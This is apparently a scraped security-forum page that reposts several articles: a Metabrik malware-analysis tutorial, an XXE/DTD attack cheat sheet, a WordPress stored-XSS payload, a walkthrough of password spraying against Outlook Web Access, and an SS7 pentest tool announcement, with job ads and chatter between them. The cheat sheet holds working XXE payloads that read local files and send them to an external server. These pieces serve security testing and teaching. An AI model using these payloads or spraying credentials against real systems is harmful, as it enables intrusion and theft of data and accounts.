@processes = map { $_->{Name} } @$RUN my $found = grep { /calc.exe/ } @processes In the below screenshot, you will see 2 as a result to the grep command. That’s because we ran two times the execute Command with calc.exe during our testing. Now, we will restore the VM to its default state, when calc.exe “malware” was not yet run. run system::virtualbox stop 602782ec-40c0-42ba-ad63-4e56a8bd5657 run system::virtualbox snapshot_restore 602782ec-40c0-42ba-ad63-4e56a8bd5657 "before calc.exe" run system::virtualbox start 602782ec-40c0-42ba-ad63-4e56a8bd5657 run remote::wmi get_win32_process my @processes = map { $_->{Name} } @$RUN my $found = grep { /calc.exe/ } @processes All clear. No more calc.exe process. You spoke about Volatility? Yes. And that’s where it starts to get interesting. You can do the same processes analysis with Volatility (and of course much more). To use Volatility, you need a dump of the system’s memory. To acquire this dump, it’s as simple as using thesystem::virtualbox dumpguestcore Command. Then, you have to extract the memory dump that is part of the generated core file. You will use the extract_memdump_from_dumpguestcore Command. Then, you will be able to perform forensic stuff on this memory dump, for instance to search if calc.exe has been popped. If you go back to the original subject -malware analysis-, you will find the Volatility is the tool of choice to check what a malware you just run with remote::winexe Brik did to processes, network handles or registry. That’s a perfect combination of tools to extract IOCs from a malware. run system::virtualbox dumpguestcore 602782ec-40c0-42ba-ad63-4e56a8bd5657 dump.core run system::virtualbox extract_memdump_from_dumpguestcore dump.core dump.volatility We have a dump usable by Volatility. Let’s dig into it with forensic::volatility Brik: use forensic::volatility set forensic::volatility input dump.volatility run forensic::volatility imageinfo set forensic::volatility profile $RUN->[0] run forensic::volatility pslist And voilà. A feature of WINEXESVC: get a remote shell on Windows One last screenshot in regards to remote::winexe Brik: how to get a Windows remote shell: run remote::winexe execute cmd.exe Conclusion We have seen that we can easily perform malware analysis on a Windows machine by using a combination of Briks. By combining features of different tools (VirtualBox, winexe and Volatility) we can, for instance, analyse consequences of running a malware on a machine. Extracting IOCs from a malware is something useful if you want to find which machines were infected on your information systems from a particuliar sample. You could then use remote::wmi Brik to scan your network for these specific patterns. Extracting IOCs is a huge topic in itself, and we just scratched the surface here by using a dynamic method associated with a “scapegoat” VM. Another way of extracting IOCs is to use static analysis, but that’s a complete different story. We urge you to play with Volatility (and of course Metabrik), you will see how powerful it could be. Enjoy. Sursa: https://www.metabrik.org/blog/2016/01/09/malware-analysis-with-vm-instrumentation-wmi-winexe-volatility-and-metabrik/
-
Mittwoch, 2. März 2016 DTD Cheat Sheet When evaluating the security of XML based services, one should always consider DTD based attack vectors, such as XML External Entities (XXE) as,for example, our previous post XXE in SAML Interfaces demonstrates. In this post we provide a comprehensive list of different DTD attacks. The attacks are categorized as follows: Denial-of-Service Attacks Classic XXE Advanced XXE Server-Side Requst Forgery (SSRF) XInclude XSLT Denial-of-Service Attacks Testing for Entity Support <!DOCTYPE data [ <!ELEMENT data (#ANY)> <!ENTITY a0 "dos" > <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;"> <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;"> ]> <data>&a2;</data> If this test is successful and and parsing process is slowed down, there is a high probability that your parser is configured insecurely and is vulnerable to at least one kind of DoS. Billion Laughs Attack (Klein, 2002) <!DOCTYPE data [ <!ENTITY a0 "dos" > <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;"> <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;"> <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;"> <!ENTITY a4 "&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;&a3;"> ]> <data>&a4;</data> This file expands to about 30 KByte but has a total of 11111 entity references and therefore exceeds a reasonable threshold of entity references. Source Billion Laughs Attack - Parameter Entities (Späth, 2015) <!DOCTYPE data SYSTEM "http://127.0.0.1:5000/dos_indirections_parameterEntity_wfc.dtd" [ <!ELEMENT data (#PCDATA)> ]> <data>&g;</data> File stored on http://publicServer.com/dos.dtd <!ENTITY % a0 "dos" > <!ENTITY % a1 "%a0;%a0;%a0;%a0;%a0;%a0;%a0;%a0;%a0;%a0;"> <!ENTITY % a2 "%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;%a1;"> <!ENTITY % a3 "%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;%a2;"> <!ENTITY % a4 "%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;%a3;"> <!ENTITY g "%a4;" > Quadratic Blowup Attack <!DOCTYPE data [ <!ENTITY a0 "dosdosdosdosdosdos...dos" ]> <data>&a0;&a0;...&a0;</data> Source Recursive General Entities This vector is not well-formed by [WFC: No Recursion]. <!DOCTYPE data [ <!ENTITY a "a&b;" > <!ENTITY b "&a;" > ]> <data>&a;</data> External General Entities (Steuck, 2002) The idea of this attack is to declare an external general entity and reference a large file on a network resource or locally (e.g. C:/pagefile.sys or /dev/random). However, conducting DoS attacks in such a manner is only applicable by making the parser process alarge XML document. <?xml version='1.0'?> <!DOCTYPE data [ <!ENTITY dos SYSTEM "file:///publicServer.com/largeFile.xml" > ]> <data>&dos;</data> Source Classic XXE Classic XXE Attack (Steuck, 2002) <?xml version="1.0"?> <!DOCTYPE data [ <!ELEMENT data (#ANY)> <!ENTITY file SYSTEM "file:///sys/power/image_size"> ]> <data>&file;</data> We use the file '/sys/power/image_size' as an example, because it is a very simple file (one line, no special characters). This attack requires a direct feedback channel and reading out files is limited by "forbidden characters in XML" such as "<" and "&". If such characters occur in the accessed file (e.g. /etc/fstab) the XML parser raises an exception and stops the parsing of the message. Source XXE Attack using netdoc <?xml version="1.0"?> <!DOCTYPE data [ <!ELEMENT data (#PCDATA)> <!ENTITY file SYSTEM "netdoc:/sys/power/image_size"> ]> <data>&file;</data> Source: @Nirgoldshlager Evolved XXE Attacks - Direct Feedback Channel This class of attacks vectors is called evolved XXE attacks and is used to (i) bypass restrictions of classic XXE attacks and (ii) for Out-of-Band attacks. Bypassing Restrictions of XXE (Morgan, 2014) <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE data [ <!ELEMENT data (#ANY)> <!ENTITY % start "<![CDATA["> <!ENTITY % goodies SYSTEM "file:///sys/power/image_size"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "http://publicServer.com/parameterEntity_core.dtd"> %dtd; ]> <data>&all;</data> File stored on http://publicServer.com/parameterEntity_core.dtd <!ENTITY all '%start;%goodies;%end;'> Source Bypassing Restrictions of XXE (Späth, 2015) <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_doctype.dtd"> <data>&all;</data> File stored on http://publicServer.com/parameterEntity_doctype.dtd <!ELEMENT data (#PCDATA)> <!ENTITY % start "<![CDATA["> <!ENTITY % goodies SYSTEM "file:///sys/power/image_size"> <!ENTITY % end "]]>"> <!ENTITY all '%start;%goodies;%end;'> XXE by abusing Attribute Values (Yunusov, 2013) This vector bypasses [WFC: No External Entity References]. <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE data [ <!ENTITY % remote SYSTEM "http://publicServer.com/external_entity_attribute.dtd"> %remote; ]> <data attrib='&internal;'/> File stored on http://publicServer.com/external_entity_attribute.dtd <!ENTITY % payload SYSTEM "file:///sys/power/image_size"> <!ENTITY % param1 "<!ENTITY internal '%payload;'>"> %param1; Source Evolved XXE Attacks - Out-of-Band channels Just because there is no direct feedback channel available does not imply that an XXE attack is not possible. XXE OOB Attack (Yunusov, 2013) <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE data SYSTEM "http://publicServer.com/parameterEntity_oob.dtd"> <data>&send;</data> File stored on http://publicServer.com/parameterEntity_oob.dtd <!ENTITY % file SYSTEM "file:///sys/power/image_size"> <!ENTITY % all "<!ENTITY send SYSTEM 'http://publicServer.com/?%file;'>"> %all; Source XXE OOB Attack - Parameter Entities (Yunusov, 2013) Here is a variation of the previous attack using only parameter entities. <?xml version="1.0"?> <!DOCTYPE data [ <!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendhttp.dtd"> %remote; %send; ]> <data>4</data> File stored on http://publicServer.com/parameterEntity_sendhttp.dtd <!ENTITY % payload SYSTEM "file:///sys/power/image_size"> <!ENTITY % param1 "<!ENTITY % send SYSTEM 'http://publicServer.com/%payload;'>"> %param1; Source XXE OOB Attack - Parameter Entities FTP (Novikov, 2014) Using the FTP protocol, an attacker can read out files of arbitrary length. <?xml version="1.0"?> <!DOCTYPE data [ <!ENTITY % remote SYSTEM "http://publicServer.com/parameterEntity_sendftp.dtd"> %remote; %send; ]> <data>4</data> File stored on http://publicServer.com/parameterEntity_sendftp.dtd <!ENTITY % payload SYSTEM "file:///sys/power/image_size"> <!ENTITY % param1 "<!ENTITY % send SYSTEM 'ftp://publicServer.com/%payload;'>"> %param1; This attack requires to setup a modified FTP server. However, adjustments to this PoC code are probably necessary to apply it to an arbitrary parser. Source SchemaEntity Attack (Späth, 2015) We identified three variations of this attack using (i) schemaLocation, (ii) noNamespaceSchemaLocation and (iii) XInclude. schemaLocation <?xml version='1.0'?> <!DOCTYPE data [ <!ENTITY % remote SYSTEM "http://publicServer.com/external_entity_attribute.dtd"> %remote; ]> <ttt:data xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:ttt="http://test.com/attack" xsi:schemaLocation="ttt http://publicServer.com/&internal;">4 noNamespaceSchemaLocation <?xml version='1.0'?> <!DOCTYPE data [ <!ENTITY % remote SYSTEM "http://publicServer.com/external_entity_attribute.dtd"> %remote; ]> <data xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://publicServer.com/&internal;"></data> XInclude <?xml version="1.0" encoding="utf-8"?> <!DOCTYPE data [ <!ENTITY % remote SYSTEM "http://publicServer.com/external_entity_attribute.dtd"> %remote; ]> <data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://192.168.2.31/&internal;" parse="text"></xi:include></data> File stored on http://publicServer.com/external_entity_attribute.dtd <!ENTITY % payload SYSTEM "file:///sys/power/image_size"> <!ENTITY % param1 "<!ENTITY internal '%payload;'>"> %param1; SSRF Attacks DOCTYPE <?xml version="1.0"?> <!DOCTYPE data SYSTEM "http://publicServer.com/" [ <!ELEMENT data (#ANY)> ]> <data>4</data> External General Entity (Steuck, 2002) <?xml version='1.0'?> <!DOCTYPE data [ <!ELEMENT data (#ANY)> <!ENTITY remote SYSTEM "http://internalSystem.com/file.xml"> ]> <data>&remote;</data> Although it is best to reference a well-formed XML file (or any text file for that matter), in order not to cause an error, it is possible with some parsers to invoke an URL without referencing a not well-formed file. Source External Parameter Entity (Yunusov, 2013) <?xml version='1.0'?> <!DOCTYPE data [ <!ELEMENT data (#ANY)> <!ENTITY % remote SYSTEM "http://publicServer.com/url_invocation_parameterEntity.dtd"> %remote; ]> <data>4</data> File stored on http://publicServer.com/url_invocation_parameterEntity.dtd <!ELEMENT data2 (#ANY)> Source XInclude <?xml version='1.0'?> <data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://publicServer.com/file.xml"></xi:include></data> File stored on http://publicServer.com/file.xml <?xml version='1.0' encoding='utf-8'?><data>it_works</data> schemaLocation <?xml version='1.0'?> <ttt:data xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:ttt="http://test.com/attack" xsi:schemaLocation="http://publicServer.com/url_invocation_schemaLocation.xsd">4</ttt:data> File stored on http://publicServer.com/url_invocation_schemaLocation.xsd <?xml version="1.0" encoding="UTF-8"?> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="data" type="xs:string"/> </xs:schema> or use this file <?xml version="1.0" encoding="UTF-8"?> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema" targetNamespace="http://test.com/attack"> <xs:element name="data" type="xs:string"/> </xs:schema> noNamespaceSchemaLocation <?xml version='1.0'?> <data xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd">4</data> File stored on http://publicServer.com/url_invocation_noNamespaceSchemaLocation.xsd <?xml version="1.0" encoding="UTF-8"?> <xs:schema xmlns:xs="http://www.w3.org/2001/XMLSchema"> <xs:element name="data" type="xs:string"/> </xs:schema> XInclude Attacks (Morgan, 2014) <data xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="/sys/power/image_size"></xi:include></data> Source XSLT Attacks <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:value-of select="document('/sys/power/image_size')"> </xsl:value-of></xsl:template> </xsl:stylesheet> Authors of this Post Christopher Späth Christian Mainka (@CheariX) Vladislav Mladenov Sursa: http://web-in-security.blogspot.ro/2016/03/xxe-cheat-sheet.html
-
Wordpress <= 4.3 Stored XSS [caption width="1" caption='<img src="//google.com/favicon.ico?' ">]</a><a href="http://onload='alert(1)'"> PS: Nu l-am testat.
-
- 4
-
-
O sa intreb la HR daca se poate, dar in principal sunt Full Time. Daca problema e cumva prezenta la facultate, cred ca nu e chiar o problema. Edit: Acel post este doar full-time.
-
Job-uri disponibile la inceput de martie: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/search/4072070 Cateva job-uri selectate: Penetration Testing Consultant: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/principal-consultant-penetration-testing-75285 Java Software Development Sr. Analyst: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/java-software-development-sr-analyst-80439 Network Security - Firewall Auditor: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-security-firewall-auditor-75062 Level 2 Technical Support Analyst: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/level-2-technical-support-analyst-81957 Firewall Engineer: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/firewall-engineer-81902 Windows System Administrator: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/windows-system-administrator-82417 Network Security Specialist - Firewall: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-security-specialist-firewall-80904 Technical Support Manager: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/technical-support-manager-81197 Junior Java Software Developer: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/java-software-development-analyst-81635 Incident Management Advisor: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/incident-management-advisor-83159 Junior Linux Admin: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/junior-linux-admin-83064 .NET Software Development Advisor: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/.net-software-development-advisor-83641 Java Software Developer: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/java-software-developer-82960 Senior Java Software Developer: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senior-java-software-developer-82976 Senior Virtualization Administrator: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senio-virtualization-administor-83424 Back-Up and Recovery Administrator: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/back-up-and-recovery-administrator-83426 Network Security Consultant: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/network-security-consultant-83755 Senior Windows Administrator: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/senior-windows-administrator-83765 IT Change Manager: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/it-change-manager-83887 Junior Information Security Specialist: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/junior-information-security-specialist-83932 IDS Support Engineer: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/ids-support-engineer-83942 Firewall Support Sr. Engineer: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/firewall-support-sr-engineer-83948 Platform Security Sr. Engineer: https://dell.referrals.selectminds.com/via/IonutP-5o7x6X/jobs/platform-security-sr-engineer-83951 Daca aveti o intrebare imi puteti trimite un PM. // Nytro
-
Ce? S-a postat peste tot ca fiind un ditamai 0day-ul si e un cacat de XSS?
-
Haaaa Nytro e mai boss ca @Zatarra Nytro e Linux Nytro e kernel Nytro e mysqld
-
Test: Utila functionalitatea. Cand postati un link de pe forum, se produce efectul de mai sus.
-
Password Spraying Outlook Web Access - How to Gain Access to Domain Credentials Without Being on a Target's Network: Part 2 February 17, 2016 | Beau Bullock This is part two of a series of posts (See part 1 here) where I am detailing multiple ways to gain access to domain user credentials without ever being on a target organization's network. The first method involves exploiting password reuse issues where a user might have reused the same password they used for their corporate domain account on another external service. The second method is what I think is a far more interesting way of gathering user credentials that involves discovering a target organization's username schema, followed by password spraying user accounts against an externally facing service that is hosted by the target organization (for example an Outlook Web Access portal). Other methods will follow these posts. In part 2, I will detail how an attacker can discover a target organization’s username schema and perform password spraying attacks against an externally facing service. The Dangers of Metadata and Publicly Facing Authentication Services Very commonly on assessments we tend to look for documents that are hosted by a target organization, and are publicly available to download. The reason we do this is because we find that very commonly organizations do a very bad job of scrubbing the metadata attached to the items they post publicly. Some very interesting things can be found in the metadata that gets attached to files. For example, if you take a photo with your cell phone and you have GPS enabled, many times that GPS location information will be attached to the picture itself. From an operational security perspective if you were to take a photo of a secure location and have GPS enabled, then posting that picture online might reveal the actual coordinates of the location you took the photo. New Profile Pic! When we look at analyzing metadata of Word documents, Excel files, PDFs, PowerPoint presentations, and more that organizations post publicly, we find very often that we can actually gain access to computer names, folder structures, as well as user names of those that created the files themselves. A great tool for quickly finding metadata and analyzing it in publicly available files of a target organization is called FOCA. You can download FOCA here: https://www.elevenpaths.com/labstools/foca/index.html FOCA simply performs Google and Bing searches with the “filetype” parameter. You can provide Google with a search like the following to search for all of the PDF files associated with the “targetorganization.net” domain: “site:targetorganization.net filetype:doc”. If you provide FOCA a target domain it starts with the top level domain and will subsequently find other subdomains where potential files are located. FOCA will then download any of these files and analyze the metadata attached to the files. On a recent engagement I ran FOCA against the domain of the target organization that I was testing. When I looked at the metadata that FOCA was able to gather from the files that were being hosted publicly I found a large number of what appeared to be user names. In fact, I was able to discover what appeared to be their actual naming convention. This naming convention did not appear to be a random or hard to guess at all. What I mean by that is that I was able to very easily craft a list of every possible combination of their username schema. For example, imagine a username schema that starts out each username with the word ‘emp’, and then simply appends the three letter initials of the employee (abc). So a possible full username would be ‘empabc’. The total number of three-character permutations of the letters ‘a’ through ‘z’ is 17,576. So, to hit every possible username combination from ‘empaaa’ through ‘empzzz’ is 17,576. I generated a list containing each of the possible permutations. Password Spraying Outlook Web Access So, now that I had a list of possibly every username combination for the target organization what could I do next as an external attacker? Next, an external attacker would have to locate some sort of external service that performs domain-based authentication. One such service that does this that we find very often is Microsoft’s Outlook Web Access (OWA). Organization’s provide the ability for their employees to access their email remotely through services like OWA. The authentication that happens when a user logs into OWA is typically domain-based, meaning that the credential used to authenticate is checked against the domain for validity. After locating an external OWA portal an attacker could brute force passwords, but will quickly lockout accounts if a lockout threshold is in place. A far more superior way of performing password attacks is called password spraying. Password spraying involves attempting to login with only one (very strategically chosen) password across all of the domain accounts. This allows an attacker to attempt many more authentication attempts without locking out users. For example, if I were to attempt to login to every account with the password ‘Winter2016’ it is very likely that someone at the target organization used that password and I will now have access to their account. Some things to consider when performing an external password spray attack: Be extremely mindful of lockout thresholds! If you submit too many bad passwords in a given amount of time you are going to lock accounts out. Without being on the target network it is impossible to know exactly what the domain account policy enforces. That being said, by default Windows default domain account policy does not enforce a lockout of any kind. This means that technically you could brute force any user’s password without locking them out. I have yet to run into an environment that does not have some sort of lockout policy. Very commonly I find that environments set their lockout policy to five (5) failed logins within a 30 minute observation window. Just use one password for spraying every two hours. This is a reasonable window that will likely not get you into a situation where you are locking out accounts. Be in close contact with your point of contact at the company to verify you are not locking anyone out. I once again used Burp Suite’s Intruder functionality to submit one login attempt for each possible username using one password. Performing a password attack in this manner limits the risk of locking out accounts as only a single login attempt is performed for each account. For example BHIS submitted the userID ‘targetorg\empaaa’ with a password of ‘Winter2015’. After this attempt the same password would be tried with ‘targetorg\empaab’, and continue on all the way to ‘targetorg\empzzz’. To do this I first setup Burp Suite to intercept all of the requests leaving my browser. I attempted to login to the OWA portal with a userID of ‘targetorg\test’ and a password of ‘Testing123’. The POST request to the OWA portal looked like the following: I then sent this request to Intruder. For this first example we will leave the attack type as ‘Sniper’. In Burp Intruder I specified only one payload position. The username is all that is going to change during the attack so this is where we add the payload position. The password will remain ‘Testing123’ or whatever you set it to be (I highly recommend season and year like ‘Winter2015’). On the payloads tab I now imported the list of probable usernames I generated. One thing I noticed was that Outlook Web Access responds to the POST request by simply setting a cookie in the browser and redirecting to the root “/” page. OWA did this for every login attempt regardless of whether the login was valid or not. So, in order for Burp to follow through with the authentication process we need to set one more setting before launching the attack. On the Options tab of Burp Intruder at the very bottom select the option to “Follow redirections” for “On-Site only”. Also, click the checkbox to “Process cookies in redirections”. Starting the attack now one can see where Burp Intruder is following each of the redirects that occur during the authentication process to OWA. The only thing left to do is to sort by the length of the response as valid authentication attempts responded with a shorter response length. In the screenshot below OWA redirects four times before hitting a page indicating a successful login. I ultimately was able to gain access to a large number of accounts via this technique. As can be seen in the screenshot below the requests that generated a response length of around 4371, and 1630 were valid user credentials. The requests that generated a response length of 12944 were failed login attempts. In the scenario I’ve demonstrated above I was utilizing the ‘Sniper’ functionality in Burp. This was mainly to avoid account lockout and only change the userID field. Being in close contact with my target organization I knew what the actual lockout threshold was as well as the observation window. In order to maximize the effectiveness of my password spraying I utilized Burp Intruder’s “Cluster Bomb” attack. With the Cluster Bomb attack you can specify two payload positions. I selected the username and password fields as my payload positions. Cluster Bomb will also allow you to specify two lists to use with each payload position. So I left the username position the same as previously with my list of potential users. I then crafted a list of 10 or so passwords that I thought would work nicely to password spray with. The Cluster Bomb attack will now iterate through all of the usernames with one of these passwords at a time. Once the spray is done for one password it will move onto the next. For example the spray would go through the entire username list with a password of Winter15, then after that spray is finished it would move onto Winter16. With my list of 17575 usernames the time it took to spray the entire list with one password was far out of the observation window in terms of lockout so I didn’t have anything to worry about there. In the example I gave above I was currently assigned to perform an external network assessment and an internal pivot assessment for the target organization. After password spraying externally over the weekend before I was scheduled to begin the internal pivot assessment I gained access to a total of 130 valid user credentials. The target organization did not detect any of the password spraying activity through their external portal. It is probably safe to say that an attacker could password spray for weeks on end gaining access to many more accounts via this technique. In this post I focused on password spraying against OWA specifically. There are many other services that this same type of attack could apply to. For example, an attacker can perform password spraying attacks against Microsoft RDP servers, SMTP servers, SSL VPN’s, and more. A great tool for doing this against most of these services is called Patator and can be found here: https://github.com/lanjelot/patator Just to recap, the steps of this approach to gathering user credentials follow: Locate publicly available files with FOCA on websites of the target organization. Analyze the metadata from those files to discover usernames and figure out their username convention. Craft a list of their entire possible username space. Password spray against an external system that performs domain authentication (like Outlook Web Access) using the username list you generated. Profit? Recommendations: Analyze all of the documents your organization is hosting publicly for information leakage via metadata. Implement policies and procedures to scrub the metadata from anything that is going to be posted publicly. Watch your OWA and any other external authentication portals for multiple failed login attempts and password spraying activity. Create stronger password policies beyond the default 8 characters (we typically recommend 15 or more). Force users to use two-factor authentication. In the event someone does password spray a user if two-factor authentication is enabled they won’t gain access to much. ______ Beau is a Security Analyst at BHIS, he also does episodes of Hack Naked TV. Read more about him here. Sursa: http://www.blackhillsinfosec.com/#!Password-Spraying-Outlook-Web-Access-How-to-Gain-Access-to-Domain-Credentials-Without-Being-on-a-Targets-Network-Part-2/c1592/56c1f10e0cf2365fef58cce1
-
CVE-2015-7547: glibc getaddrinfo stack-based buffer overflow
Nytro replied to Nytro's topic in Exploituri
Informatii detaliate: https://sourceware.org/ml/libc-alpha/2016-02/msg00416.html -
Exista sintaxa colorata insa nu merge cum ar trebui. Le-am raportat problema si sper sa o rezolv in curand, insa boschetii astia tot imi cer acces FTP si de admin si le zic de fiecare data ca nu le dau Cred ca pot ascunde textul din spoilers pentru Guests, doar ca nu am vazut sa se foloseasca prea mult. Edit: Am pus "Allowed CSS classes", ceva clase, si pare sa mearga cat de cat. Nu stiu daca e complet functional sau trebuie sa mai adaug si altele, dar e cat de cat ok.
-
ss7MAPer – A SS7 pen testing toolkit Posted by Daniel Mende While running some SS7 pentests last year, I developed a small tool automating some of the well-known SS7 attack cases. Today I’m releasing the first version of ss7MAPer, a SS7 MAP (pen-)testing toolkit. The toolkit is build upon the Osmocom SS7 stack and implements some basic MAP messages. At its current state tests against the HLR are ready for use, in future versions tests against VLR, MSC andSMSC will follow. The source code of the tool is published on github, feel free to use and extend. The tool is written in Erlang; to get it runing you will need the Erlang runtime environment. It is developed for version 17.5. As example, the screenshot below shows the output of the tool against a HLR, testing which MAP messages are accepted and the results given back. As you can see in the picture, the demonstrated test cases for the HLR respond to most of the MAP messages regardless the fact that we are not registered as valid provider. The tool is not configured as a serving MSC nor a roaming contractor. Some of the information gathered can be seen as critical, as the MSISD -> IMSI resolution, the over-the-air crypto keys or the ability to create supplementary services e.g. call forwardings. The code (and its dependencies) are not that easy to compile but I tried to give a complete step by step instructions in the README file. The messages and test cases are gathered from public SS7 research of the last years (see 1, 2) and check for known weaknesses in the SS7 domain. The tool itself was developed under a cooperation with the belgium provider Proximus and aims to test the secure configuration of the internal and external SS7 network access. Thanks a lot for giving us the opportunity here, we are convinced that the tool gives the research community but also telecommunication providers a new, important and (especially) open-source-based possibility for SS7 testing. More about the tool and SS7 testing on Troopers TelcoSecDay, Telco Network Security & Network Protocol Fuzzing Workshop. That’s it, get the code, try the tool. Best wishes from Heidelberg. /daniel Sursa: https://www.insinuator.net/2016/02/ss7maper-a-ss7-pen-testing-toolkit/